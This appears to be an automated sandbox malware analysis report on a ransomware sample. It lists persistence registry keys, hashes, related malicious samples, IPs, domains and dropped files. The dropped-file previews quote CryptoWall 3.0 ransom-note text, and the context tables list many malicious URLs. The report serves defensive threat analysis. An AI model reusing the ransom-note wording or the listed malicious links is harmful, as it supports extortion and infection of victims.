                                                                                                                          Classification:mal100.rans.phis.troj.spyw.evad.winEXE@26/1205@15/13
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 97%
                                                                                                                          • Number of executed functions: 227
                                                                                                                          • Number of non-executed functions: 137
                                                                                                                          Cookbook Comments:
                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, vga.dll, conhost.exe, VSSVC.exe, svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 216.58.215.227, 172.217.168.14, 173.194.79.84, 142.250.203.99, 34.104.35.123
                                                                                                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, edgedl.me.gvt1.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • VT rate limit hit for: 0t8amSU3vd.exe

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          12:09:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34B C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          12:09:42AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34B C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          12:09:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34B C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          12:10:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.html
                                                                                                                          12:10:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.txt
                                                                                                                          15:09:31API Interceptor75513x Sleep call for process: svcmtr.exe modified
                                                                                                                          15:09:31API Interceptor3x Sleep call for process: 0t8amSU3vd.exe modified
                                                                                                                          15:09:35API Interceptor12x Sleep call for process: vssadmin.exe modified

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          34.117.59.81file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                          • ipinfo.io/json
                                                                                                                          Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • ipinfo.io/json
                                                                                                                          idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                          • ipinfo.io/json
                                                                                                                          idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                          • ipinfo.io/json
                                                                                                                          FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                          • ipinfo.io/json
                                                                                                                          172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • ipinfo.io/json
                                                                                                                          VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                          • ipinfo.io/json
                                                                                                                          UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • ipinfo.io/json
                                                                                                                          I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                                          • ipinfo.io/json
                                                                                                                          licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                                          • ipinfo.io/ip
                                                                                                                          103.198.0.111http://5n7y4yihirccftc5.tor2web.orgGet hashmaliciousUnknownBrowse
                                                                                                                          • 5n7y4yihirccftc5.tor2web.org/
                                                                                                                          185.230.63.171firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.230.63.171/
                                                                                                                          firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 185.230.63.171/
                                                                                                                          https://cloudsscc.comGet hashmaliciousUnknownBrowse
                                                                                                                          • solve1.com/
                                                                                                                          xqz8sQ4mZB.exeGet hashmaliciousGlupteba, SmokeLoaderBrowse
                                                                                                                          • valentinegrowers.com/wp-login.php
                                                                                                                          file.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoaderBrowse
                                                                                                                          • orientalwok.com/admin
                                                                                                                          3yPvcmrbqS.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5SystemzBrowse
                                                                                                                          • u90soccercenter.com/administrator/
                                                                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                          • wolfbrewingcompany.com/admin/
                                                                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                          • ehiehr.com/administrator/index.php
                                                                                                                          klWGq3yDcQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • dstaq.com/administrator/index.php
                                                                                                                          zGIDlWIotR.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • waterlanguage.net/index.php

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          ipinfo.ioz.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          h.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          1.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          1.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          DownloadedMessage.zipGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          td-ccm-neg-87-45.wixdns.netSH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          https://hopp.bio/wchnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          https://www.hopp.bio/granovitasauGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          https://t.ly/X0-7QGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          https://www.hopp.bio/hawksridgefarmsGet hashmaliciousMamba2FABrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          https://atuiqe.com/so/99PC8OXJg/c?w=QkhD4F_29qlP63xGZtdrzJ7YP7_meHXlHcBWS8oSJek.eyJ1IjoiaHR0cHM6Ly93d3cuYXR1aXFlLmNvbS8iLCJtIjoibWFpbCIsImMiOiJhNmQ4NTViMi04ODFjLTQ4ZDItYmIwMC0wYzNhZGEyOTdhNTYifQGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          http://shoutout.wix.comGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          http://fleurifleuri.com/Get hashmaliciousUnknownBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          https://realestatemania.ca/kxyNao-7Ms6e-WBJnj-uMnVb-7gZJL-v8aOp.phpGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                          • 34.149.87.45

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          GVOUShttps://gogvo.com/redir.php?url=https://atratejarat.com/wp-content/red/DhmgvVGet hashmaliciousUnknownBrowse
                                                                                                                          • 199.116.252.221
                                                                                                                          Etisalat Summary Bill for the Month of August.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 199.116.255.220
                                                                                                                          http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/Get hashmaliciousUnknownBrowse
                                                                                                                          • 97.79.238.128
                                                                                                                          https://sites.google.com/view/centregreatlimited/homeGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                          • 97.79.238.13
                                                                                                                          https://sites.google.com/view/busch-vacuum/homeGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                          • 199.116.250.99
                                                                                                                          https://docsend.com/view/9i4fkz7idqy3vyqnGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                          • 97.79.239.8
                                                                                                                          https://indd.adobe.com/view/71dbbc53-5800-4131-9ef5-d0863a449284Get hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 199.116.250.7
                                                                                                                          https://indd.adobe.com/view/71dbbc53-5800-4131-9ef5-d0863a449284Get hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 199.116.250.7
                                                                                                                          https://indd.adobe.com/view/71dbbc53-5800-4131-9ef5-d0863a449284Get hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 199.116.250.7
                                                                                                                          UKfz9ypQ3N.exeGet hashmaliciousWannacryBrowse
                                                                                                                          • 97.79.237.125
                                                                                                                          GOOGLE-AS-APGoogleAsiaPacificPteLtdSGhttps://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/Get hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.77.79
                                                                                                                          z.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          h.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          mail (4).emlGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.67.241.53
                                                                                                                          https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428Get hashmaliciousUnknownBrowse
                                                                                                                          • 34.66.73.214
                                                                                                                          https://link.hawkmarketplace.com/ls/click?upn=u001.NRX3OcAfcLfHWEd5qsjyzM6WT-2BF1VD5Gk5YbgIAYbY5U3l7YahZ9jFJiEbbS6IhBN6yYvKFeVvnzAjGEnyANBjGf6UhHhAeaI0f24bn3m8M-3DHEd8_ZxwDPev-2F4SWtaU7KVH4NQ3q5LCEea7ZiHXCgQiJrQ1jpoX7NCWIIGJClL-2BqW9-2BJ8dhfmmFfj6cPRkRgADgKcmt3XMWLYM3V7MFiCh8f014GFwkmQ3GEzOC8nL-2BOxe3qWJqB7aoQU5RKRMsfFPXsD4Zt-2Be2oroYIyJDNmWjUgDL5V7HAKgE194R1-2BYTOA6UadnB-2FMyPfxgtmNoA5XpjrfVAH50OiGYNfFIK-2F3aJ5rCoUYWz1YP18RYPxsUE9LavCbXpafbb24UXsSHjwy4rPeclHJt3tNf2SAVjBLt6j7rlUrDpc3-2FqO9y7WD1ZBsqXtnpWCQhDSZ924UU9le6tPESMTqmtxKUOlruY-2BzVXGgyEvtnAUlLXOuCct0jL2Du4cgr0gUZ2V-2FfH6mPhOS9rs7fW3nY-2FbFGnNg1OqISBN1rIMOcLsr0O1MZyLDfxW27bhudEr6njYPINhVMCgwtlalj6XYRz7b9SyPGHlBY6Ci2Gbcn32cL5aslGjCqtVDYGHKsFYo5jaIEPqGYISgsJiaPqmpFC8dLiEIvRcdJBMMJoPxX-2FIBBQmmC4f74WRmIvwdnghIavPV0ZvqAzKpaGndN-2BsJcX2FpWDJRu9rt0-2FX59eoGfPXYZU0Tgei5bwv2gDdKWDu6M2QuCLBM4IHa3a3HRauswtESBoBdu5v-2FJ04VJjlz8k9284YG4Cr9-2FyMDn6AwFh-2F5XNnMyOmiOrisCfxpaqbhpCj1BIF-2BOzhIy1rwY-2FA0CSTyLka9O73zS4Gp-2BIvyZEGNN-2BpDFcLQJEjSzBA993huIFGUPbuHdJ-2F-2FcF7i2mw6MAVMpzgEQkaPauPql95zvuXNqRkHqLXiZ-2Fl3p7k-2BjfBVJ-2FGwneL-2BhXZ8E4jTuza6Nmx10cRzpLfBicvf-2Bn3i9nrdUmzWjTe4MiNSNOTdym0BUPGe2fvFPQ-2FHsCyV5Y8T43YQb7sWM-2F11jhxMbvHfEffa-2FXAHokMr-2BhY23oqCQI1sD7nPmUzvqfqW0mMUmujg2hgXqoowzSalOUFi3se0F-2F50iXpiCygHyk5DP-2Bn-2BQ-3D-3DGet hashmaliciousHtmlDropperBrowse
                                                                                                                          • 34.67.241.53
                                                                                                                          https://www.kentuckyfriedsalmonpadon.com/caHbBZmGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.162.98
                                                                                                                          file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.229.111
                                                                                                                          Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.239.71
                                                                                                                          1.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.59.81
                                                                                                                          HOSTINGSERVICES-INCUSsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 50.31.252.108
                                                                                                                          e5AiOG6uDI.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                          • 67.213.210.121
                                                                                                                          RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 107.182.238.163
                                                                                                                          https://www.google.md/url?url=https://demeropkdfzdbi&uxzs=zemleptc&icmeyuc=zn0&ywprgz=icmeyuc&uxzs=zemleptc&ywprgz=icmeyuc&fzdbi=demeropkd&znzn=ywprgzuxzs&q=amp%2Fdecentafrica.com%2Flok%2F1160851136%2FZHVzdGluLmZpY2NvQHZvc3Nsb2guY29tGet hashmaliciousUnknownBrowse
                                                                                                                          • 107.182.236.192
                                                                                                                          http://5n7y4yihirccftc5.tor2web.orgGet hashmaliciousUnknownBrowse
                                                                                                                          • 103.198.0.111
                                                                                                                          LisectAVT_2403002B_136.dllGet hashmaliciousEmotetBrowse
                                                                                                                          • 107.182.225.142
                                                                                                                          Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 67.213.210.118
                                                                                                                          kz7iLmqRuq.exeGet hashmaliciousQuasarBrowse
                                                                                                                          • 67.213.212.129
                                                                                                                          INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 67.213.210.115
                                                                                                                          063837646WAYBILLMAR24.exeGet hashmaliciousRedLineBrowse
                                                                                                                          • 67.213.210.115

                                                                                                                          JA3 Fingerprints

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          7dcce5b76c8b17472d024758970a406b25F.tmp.exeGet hashmaliciousDarkbotBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          • 185.230.63.171
                                                                                                                          Hwacaj.exeGet hashmaliciousDarkbotBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          • 185.230.63.171
                                                                                                                          Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          • 185.230.63.171
                                                                                                                          Pago.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          • 185.230.63.171
                                                                                                                          NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          • 185.230.63.171
                                                                                                                          PyrNUtAUkw.docxGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          • 185.230.63.171
                                                                                                                          SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          • 185.230.63.171
                                                                                                                          CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          • 185.230.63.171
                                                                                                                          Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          • 185.230.63.171
                                                                                                                          Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                          • 34.149.87.45
                                                                                                                          • 185.230.63.171

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1001\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Reputation:low
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1001\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Reputation:low
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1003\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Reputation:low
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1003\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Reputation:low
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1004\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1004\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1005\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
